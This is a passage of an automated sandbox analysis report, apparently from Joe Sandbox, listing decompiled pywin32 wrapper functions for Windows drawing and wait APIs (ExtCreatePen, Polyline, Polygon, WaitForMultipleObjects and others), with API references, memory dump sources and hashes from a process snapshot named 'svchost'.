                            						__imp__?PyWinObject_AsDWORDArray@@YAHPAU_object@@PAPAKPAKH@Z(_v32, _t28,  &_v24, 1);
                            						_t41 =  &(_t40[4]);
                            						if(_t28 == 0) {
                            							goto L1;
                            						} else {
                            							_t35 = ExtCreatePen(_v16, _v20,  &_v12, _v24, _v36);
                            							_t31 = _v56;
                            							if(_t31 != 0) {
                            								free(_t31);
                            								_t41 =  &(_t41[1]);
                            							}
                            							if(_t35 != 0) {
                            								return E6DAA5630(_t33, _t35);
                            							} else {
                            								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("ExtCreatePen", _t35);
                            								return _t31;
                            							}
                            						}
                            					}
                            				} else {
                            					L1:
                            					return 0;
                            				}
                            			}





















                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,kkO|O:ExtCreatePen,?,?,?), ref: 6DAAD1E1
                            • ?PyWinObject_AsDWORDArray@@YAHPAU_object@@PAPAKPAKH@Z.PYWINTYPES38(?,?,?,00000001), ref: 6DAAD219
                            • ExtCreatePen.GDI32(?,?,?,?,?), ref: 6DAAD23C
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DAAD24D
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ExtCreatePen,00000000), ref: 6DAAD260
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Array@@CreateError@@Object_ParseTupleWin_free
                            • String ID: ExtCreatePen$kkO|O:ExtCreatePen
                            • API String ID: 1050809504-2756505571
                            • Opcode ID: 2a06922b03688e6ab7dd35d8c5f09609be76354b3b54391a88c688ff6eab9ea0
                            • Instruction ID: d6b0ebf7fb5becf740c743451e19bcb0d5462a29e715e2d42dc8f081dc68ccae
                            • Opcode Fuzzy Hash: 2a06922b03688e6ab7dd35d8c5f09609be76354b3b54391a88c688ff6eab9ea0
                            • Instruction Fuzzy Hash: 36114CB540C305AFDB018F15CD44AAB7BE8BF84214F488A29FD89C2121F731DA99CB93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            			E6DAAA980(intOrPtr _a8) {
                            				struct HDC__* _v4;
                            				int _v8;
                            				char _v12;
                            				char _v16;
                            				void* _v20;
                            				char* _t14;
                            				struct HDC__** _t15;
                            				void* _t19;
                            				int _t20;
                            				intOrPtr _t23;
                            				void* _t25;
                            				void** _t28;
                            				void** _t29;
                            				void** _t30;
                            
                            				_v20 = 0;
                            				_t14 =  &_v16;
                            				_t23 = 0;
                            				__imp__PyArg_ParseTuple(_a8, "OO:Polyline", _t14,  &_v12);
                            				_t28 =  &(( &_v20)[4]);
                            				if(_t14 != 0) {
                            					_t15 =  &_v4;
                            					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v16, _t15);
                            					_t29 =  &(_t28[2]);
                            					if(_t15 == 0) {
                            						goto L1;
                            					} else {
                            						_t19 = E6DAAA7E0( &_v20, _v12,  &_v20,  &_v8);
                            						_t30 =  &(_t29[3]);
                            						if(_t19 == 0) {
                            							goto L1;
                            						} else {
                            							_t25 = _v20;
                            							_t20 = Polyline(_v4, _t25, _v8);
                            							if(_t20 != 0) {
                            								 *__imp___Py_NoneStruct =  *__imp___Py_NoneStruct + 1;
                            								_t23 = __imp___Py_NoneStruct;
                            							} else {
                            								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("Polyline", _t20);
                            								_t30 =  &(_t30[2]);
                            							}
                            							if(_t25 != 0) {
                            								free(_t25);
                            							}
                            							return _t23;
                            						}
                            					}
                            				} else {
                            					L1:
                            					return 0;
                            				}
                            			}


















                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:Polyline,?,?), ref: 6DAAA9A1
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAA9BE
                            • Polyline.GDI32(?,?,?), ref: 6DAAA9F3
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(Polyline,00000000), ref: 6DAAAA03
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DAAAA20
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@Object_ParsePolylineTupleWin_free
                            • String ID: OO:Polyline$Polyline
                            • API String ID: 182940580-263511019
                            • Opcode ID: 880d920dc5d203c8b3e9f64730881e826ff6f4f728d48ae00fa444e873a54d12
                            • Instruction ID: bab87c3cec139355a16d254f96a44f36a1716f0bccbd6edd091d3e6ae99351ff
                            • Opcode Fuzzy Hash: 880d920dc5d203c8b3e9f64730881e826ff6f4f728d48ae00fa444e873a54d12
                            • Instruction Fuzzy Hash: 8B11B27650C201AFD7009F18DD44E6B7BF9FF85304F098629FC45D2121E331D91A86A3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 37%
                            			E6DAAA8C0(intOrPtr _a8) {
                            				struct HDC__* _v4;
                            				int _v8;
                            				char _v12;
                            				char _v16;
                            				void* _v20;
                            				char* _t14;
                            				struct HDC__** _t15;
                            				void* _t19;
                            				int _t20;
                            				intOrPtr _t23;
                            				void* _t25;
                            				void** _t28;
                            				void** _t29;
                            				void** _t30;
                            
                            				_v20 = 0;
                            				_t14 =  &_v16;
                            				_t23 = 0;
                            				__imp__PyArg_ParseTuple(_a8, "OO:PolyGon", _t14,  &_v12);
                            				_t28 =  &(( &_v20)[4]);
                            				if(_t14 != 0) {
                            					_t15 =  &_v4;
                            					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v16, _t15);
                            					_t29 =  &(_t28[2]);
                            					if(_t15 == 0) {
                            						goto L1;
                            					} else {
                            						_t19 = E6DAAA7E0( &_v20, _v12,  &_v20,  &_v8);
                            						_t30 =  &(_t29[3]);
                            						if(_t19 == 0) {
                            							goto L1;
                            						} else {
                            							_t25 = _v20;
                            							_t20 = Polygon(_v4, _t25, _v8);
                            							if(_t20 != 0) {
                            								 *__imp___Py_NoneStruct =  *__imp___Py_NoneStruct + 1;
                            								_t23 = __imp___Py_NoneStruct;
                            							} else {
                            								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("PolyGon", _t20);
                            								_t30 =  &(_t30[2]);
                            							}
                            							if(_t25 != 0) {
                            								free(_t25);
                            							}
                            							return _t23;
                            						}
                            					}
                            				} else {
                            					L1:
                            					return 0;
                            				}
                            			}


















                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:PolyGon,?,?), ref: 6DAAA8E1
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAA8FE
                            • Polygon.GDI32(?,?,?), ref: 6DAAA933
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(PolyGon,00000000), ref: 6DAAA943
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DAAA960
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@Object_ParsePolygonTupleWin_free
                            • String ID: OO:PolyGon$PolyGon
                            • API String ID: 83150672-1472614813
                            • Opcode ID: eb5dd2dd40e58889ee53cc4d4772dbf47866a1faf108725175e61b87aa8abbb9
                            • Instruction ID: 2e6713f06a179ca6ae42b44e1b7003a309e2c368f49753a1b4568f66ab96b254
                            • Opcode Fuzzy Hash: eb5dd2dd40e58889ee53cc4d4772dbf47866a1faf108725175e61b87aa8abbb9
                            • Instruction Fuzzy Hash: 6F119D7A50C201EFD7009F19DD44AAB77FAFF89204F098629FC59D2121E331D95A8AA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyErr_SetString.PYTHON38(6E28ED8C,LOGBRUSH must be a dict), ref: 6DAAD0BD
                            • PyTuple_New.PYTHON38(00000000), ref: 6DAAD0CD
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Err_StringTuple_
                            • String ID: LOGBRUSH must be a dict$kkO
                            • API String ID: 3492737308-1200731744
                            • Opcode ID: a17e449c6730bb2b3b73f132a698dacadedc4fa27b77cdbcd21082f9089366b0
                            • Instruction ID: 34e1d710386a4acca988962635823d23ceb15c90dcc52b190557a98528ccf906
                            • Opcode Fuzzy Hash: a17e449c6730bb2b3b73f132a698dacadedc4fa27b77cdbcd21082f9089366b0
                            • Instruction Fuzzy Hash: D7118E7160C2029FDB009F18EC84F6B77B8AF81325F084325FC8587166E731D996C6A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiO|i:SetScrollInfo,?,?,?), ref: 6DAAB556
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAB572
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAB59E
                            • SetScrollInfo.USER32(?,?,?,?), ref: 6DAAB5B7
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAB5C0
                            • PyLong_FromLong.PYTHON38(00000000), ref: 6DAAB5C7
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_FromInfoLongLong_Object_ParseRestoreSaveScrollTupleU_object@@
                            • String ID: OiO|i:SetScrollInfo
                            • API String ID: 863692505-3799893602
                            • Opcode ID: b32ec0235cf1d72fd7fd04512b795b7dd03e05339b2e9f958a605e678269fbca
                            • Instruction ID: 4e3e20b09985753fe0e10a451852a0d69633208416b86afc1a7daba87b9f5ec0
                            • Opcode Fuzzy Hash: b32ec0235cf1d72fd7fd04512b795b7dd03e05339b2e9f958a605e678269fbca
                            • Instruction Fuzzy Hash: AE115E76008206AFDB01DF14DC44AABBBFCBF85305F088A29F995C1130E735CA5A8B63
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 28%
                            			E6DA91320(void* __eflags, intOrPtr _a4, int _a8, long _a12, int _a16) {
                            				long _v4;
                            				HANDLE* _v8;
                            				void* _t12;
                            				long _t13;
                            				void* _t15;
                            				long _t16;
                            				void* _t18;
                            
                            				_t12 = E6DA91050( &_v8, _a4,  &_v8,  &_v4);
                            				if(_t12 != 0) {
                            					__imp__PyEval_SaveThread(_t18, _t15);
                            					_t13 = WaitForMultipleObjectsEx(_v4, _v8, _a8, _a12, _a16);
                            					_t16 = _t13;
                            					__imp__PyEval_RestoreThread(_t12);
                            					if(_t16 != 0xffffffff) {
                            						__imp__PyLong_FromLong(_t16);
                            					} else {
                            						__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("WaitForMultipleObjectsEx", 0);
                            					}
                            					free(_v8);
                            					return _t13;
                            				} else {
                            					return _t12;
                            				}
                            			}











                            APIs
                              • Part of subcall function 6DA91050: PySequence_Check.PYTHON38(?), ref: 6DA91057
                              • Part of subcall function 6DA91050: PyErr_SetString.PYTHON38(6E28ED8C,Handles must be a list of integers), ref: 6DA91070
                            • PyEval_SaveThread.PYTHON38 ref: 6DA91343
                            • WaitForMultipleObjectsEx.KERNEL32(?,?,?,?,?), ref: 6DA9135F
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DA91368
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(WaitForMultipleObjectsEx,00000000), ref: 6DA9137D
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DA91398
                            Strings
                            • WaitForMultipleObjectsEx, xrefs: 6DA91378
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$CheckErr_Error@@MultipleObjectsRestoreSaveSequence_StringU_object@@WaitWin_free
                            • String ID: WaitForMultipleObjectsEx
                            • API String ID: 3294986040-1369009817
                            • Opcode ID: 4cef1ed50dcc708ec85ef225560414aa7ab92aa11bff50f8384818dca73e26ae
                            • Instruction ID: adc4d59fdc8b62fd2c948e2e72a5888c3288452c0a5494a76ea24c83e7c1a825
                            • Opcode Fuzzy Hash: 4cef1ed50dcc708ec85ef225560414aa7ab92aa11bff50f8384818dca73e26ae
                            • Instruction Fuzzy Hash: E901F27581C300ABCF001BA4EC45A6B7AF8FF4D21AF048634F95599150E73AC9299BA7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 28%
                            			E6DA91200(void* __eflags, intOrPtr _a4, long _a8, long _a12, long _a16) {
                            				long _v4;
                            				HANDLE* _v8;
                            				void* _t12;
                            				long _t13;
                            				void* _t15;
                            				long _t16;
                            				void* _t18;
                            
                            				_t12 = E6DA91050( &_v8, _a4,  &_v8,  &_v4);
                            				if(_t12 != 0) {
                            					__imp__PyEval_SaveThread(_t18, _t15);
                            					_t13 = MsgWaitForMultipleObjectsEx(_v4, _v8, _a8, _a12, _a16);
                            					_t16 = _t13;
                            					__imp__PyEval_RestoreThread(_t12);
                            					if(_t16 != 0xffffffff) {
                            						__imp__PyLong_FromLong(_t16);
                            					} else {
                            						__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("MsgWaitForMultipleObjectsEx", 0);
                            					}
                            					free(_v8);
                            					return _t13;
                            				} else {
                            					return _t12;
                            				}
                            			}











                            APIs
                              • Part of subcall function 6DA91050: PySequence_Check.PYTHON38(?), ref: 6DA91057
                              • Part of subcall function 6DA91050: PyErr_SetString.PYTHON38(6E28ED8C,Handles must be a list of integers), ref: 6DA91070
                            • PyEval_SaveThread.PYTHON38 ref: 6DA91223
                            • MsgWaitForMultipleObjectsEx.USER32 ref: 6DA9123F
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DA91248
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(MsgWaitForMultipleObjectsEx,00000000), ref: 6DA9125D
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DA91278
                            Strings
                            • MsgWaitForMultipleObjectsEx, xrefs: 6DA91258
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$CheckErr_Error@@MultipleObjectsRestoreSaveSequence_StringU_object@@WaitWin_free
                            • String ID: MsgWaitForMultipleObjectsEx
                            • API String ID: 3294986040-1368896270
                            • Opcode ID: 17a7db5ce02db75a95e6444277f3ce990ac0ef48142d92302167939b46608702
                            • Instruction ID: 5775024992b39ba498e29a6a85330171292cb6582c50d2eebb7c67876aed7c7d
                            • Opcode Fuzzy Hash: 17a7db5ce02db75a95e6444277f3ce990ac0ef48142d92302167939b46608702
                            • Instruction Fuzzy Hash: FE01DF7581C300ABCF002BA4EC45A6A7AF8BF4E21AF048934F955D5150E73689299BA7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 28%
                            			E6DA91170(void* __eflags, intOrPtr _a4, int _a8, long _a12, long _a16) {
                            				long _v4;
                            				HANDLE* _v8;
                            				void* _t12;
                            				long _t13;
                            				void* _t15;
                            				long _t16;
                            				void* _t18;
                            
                            				_t12 = E6DA91050( &_v8, _a4,  &_v8,  &_v4);
                            				if(_t12 != 0) {
                            					__imp__PyEval_SaveThread(_t18, _t15);
                            					_t13 = MsgWaitForMultipleObjects(_v4, _v8, _a8, _a12, _a16);
                            					_t16 = _t13;
                            					__imp__PyEval_RestoreThread(_t12);
                            					if(_t16 != 0xffffffff) {
                            						__imp__PyLong_FromLong(_t16);
                            					} else {
                            						__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("MsgWaitForMultipleObjects", 0);
                            					}
                            					free(_v8);
                            					return _t13;
                            				} else {
                            					return _t12;
                            				}
                            			}

                            APIs
                              • Part of subcall function 6DA91050: PySequence_Check.PYTHON38(?), ref: 6DA91057
                              • Part of subcall function 6DA91050: PyErr_SetString.PYTHON38(6E28ED8C,Handles must be a list of integers), ref: 6DA91070
                            • PyEval_SaveThread.PYTHON38 ref: 6DA91193
                            • MsgWaitForMultipleObjects.USER32 ref: 6DA911AF
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DA911B8
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(MsgWaitForMultipleObjects,00000000), ref: 6DA911CD
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DA911E8
                            Strings
                            • MsgWaitForMultipleObjects, xrefs: 6DA911C8
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$CheckErr_Error@@MultipleObjectsRestoreSaveSequence_StringU_object@@WaitWin_free
                            • String ID: MsgWaitForMultipleObjects
                            • API String ID: 3294986040-3213911756
                            • Opcode ID: 00577faf9534403a297f48ad247e99d0e15a096dca1b6e3ef19a1706f50d0a73
                            • Instruction ID: adce253840081b8e6643889586667b130cfe5f65bd232d9fb1aef46982186ae4
                            • Opcode Fuzzy Hash: 00577faf9534403a297f48ad247e99d0e15a096dca1b6e3ef19a1706f50d0a73
                            • Instruction Fuzzy Hash: CD01F27581C300ABCF001BA4FC45A6A7AF8BF4D21AF148938F99595190EB36C9399B97
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 28%
                            			E6DA91290(void* __eflags, intOrPtr _a4, int _a8, long _a12) {
                            				long _v4;
                            				HANDLE* _v8;
                            				void* _t11;
                            				long _t12;
                            				void* _t14;
                            				long _t15;
                            				void* _t17;
                            
                            				_t11 = E6DA91050( &_v8, _a4,  &_v8,  &_v4);
                            				if(_t11 != 0) {
                            					__imp__PyEval_SaveThread(_t17, _t14);
                            					_t12 = WaitForMultipleObjects(_v4, _v8, _a8, _a12);
                            					_t15 = _t12;
                            					__imp__PyEval_RestoreThread(_t11);
                            					if(_t15 != 0xffffffff) {
                            						__imp__PyLong_FromLong(_t15);
                            					} else {
                            						__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("WaitForMultipleObjects", 0);
                            					}
                            					free(_v8);
                            					return _t12;
                            				} else {
                            					return _t11;
                            				}
                            			}

                            APIs
                              • Part of subcall function 6DA91050: PySequence_Check.PYTHON38(?), ref: 6DA91057
                              • Part of subcall function 6DA91050: PyErr_SetString.PYTHON38(6E28ED8C,Handles must be a list of integers), ref: 6DA91070
                            • PyEval_SaveThread.PYTHON38 ref: 6DA912B3
                            • WaitForMultipleObjects.KERNEL32(?,?,?,?), ref: 6DA912CB
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DA912D4
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(WaitForMultipleObjects,00000000), ref: 6DA912E9
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DA91304
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$CheckErr_Error@@MultipleObjectsRestoreSaveSequence_StringU_object@@WaitWin_free
                            • String ID: WaitForMultipleObjects
                            • API String ID: 3294986040-3113178308
                            • Opcode ID: bb1729fd2711d8edd7243138668bfe74f03d288763616a41e9a910c5ae09f1eb
                            • Instruction ID: 39656edf32e8c70dd32ec7e76dc979977c2c705e954a0b6d056bd57af9ea16cc
                            • Opcode Fuzzy Hash: bb1729fd2711d8edd7243138668bfe74f03d288763616a41e9a910c5ae09f1eb
                            • Instruction Fuzzy Hash: F201267581C301ABCF016BA4EC49A6A7BF8FF4E219F048531FD21C5250EB76882D9B97
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oii:SetWindowExtEx,?,?,?), ref: 6DAA9D4B
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA9D67
                            • SetWindowExtEx.GDI32(?,?,?,?), ref: 6DAA9D85
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetWindowExtEx,00000000), ref: 6DAA9D95
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@Object_ParseTupleWin_Window
                            • String ID: Oii:SetWindowExtEx$SetWindowExtEx
                            • API String ID: 1987995377-1745722152
                            • Opcode ID: a377f8a9881a252df4f223545286b6fbdfcbf80037b4ee1e10afc2440f4273be
                            • Instruction ID: dfeec19217c382ce47d1f48b26a334e47a7b456780147952d90a8d127d5c042b
                            • Opcode Fuzzy Hash: a377f8a9881a252df4f223545286b6fbdfcbf80037b4ee1e10afc2440f4273be
                            • Instruction Fuzzy Hash: 3401F47640C201BFDB01AF55CD45DAB7BBDBF84205F888968F985C1032E732C96A9B93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oiik:SetPixel,?,?,?,?), ref: 6DAAA600
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAA61C
                            • SetPixel.GDI32(?,?,?,?), ref: 6DAAA639
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetPixel,00000000), ref: 6DAAA64B
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@Object_ParsePixelTupleWin_
                            • String ID: Oiik:SetPixel$SetPixel
                            • API String ID: 2935145084-2504120362
                            • Opcode ID: cee15d4fa53f3e7dcb14182df911f8ac37f516eaa75e9f88e27607081fc872c7
                            • Instruction ID: 0faa4441b50c15530b7136fc32952f4880b90a7c453cc1cc94de92aa8420f0b7
                            • Opcode Fuzzy Hash: cee15d4fa53f3e7dcb14182df911f8ac37f516eaa75e9f88e27607081fc872c7
                            • Instruction Fuzzy Hash: AB0184B940C201BFCB009F54DD45E5B77F9BF44601F888A29F956C1061E331D9299BA7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Ol:SetBkColor,?,?), ref: 6DAB493D
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB4959
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB4968
                            • SetBkColor.GDI32(?,?), ref: 6DAB4978
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB4981
                            • Py_BuildValue.PYTHON38(6DABBCB0,00000000), ref: 6DAB498D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_BuildColorObject_ParseRestoreSaveTupleU_object@@Value
                            • String ID: Ol:SetBkColor
                            • API String ID: 4268770495-3469434366
                            • Opcode ID: f66d08b9b2e7aecdd03458052aee42df10790a0620ac43631c408c88f7760bb8
                            • Instruction ID: 932b545f1a2d37f18a1942a76a1dbb9ab2ef7cccd3d5b0b4d4cb446b260b63b0
                            • Opcode Fuzzy Hash: f66d08b9b2e7aecdd03458052aee42df10790a0620ac43631c408c88f7760bb8
                            • Instruction Fuzzy Hash: F6F08136408201AFDB009B25ED89B7B7BBCFF85215F048629FC89C1121E775895ADB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oi:GetMenuItemID,?,?), ref: 6DAB38DD
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB38F9
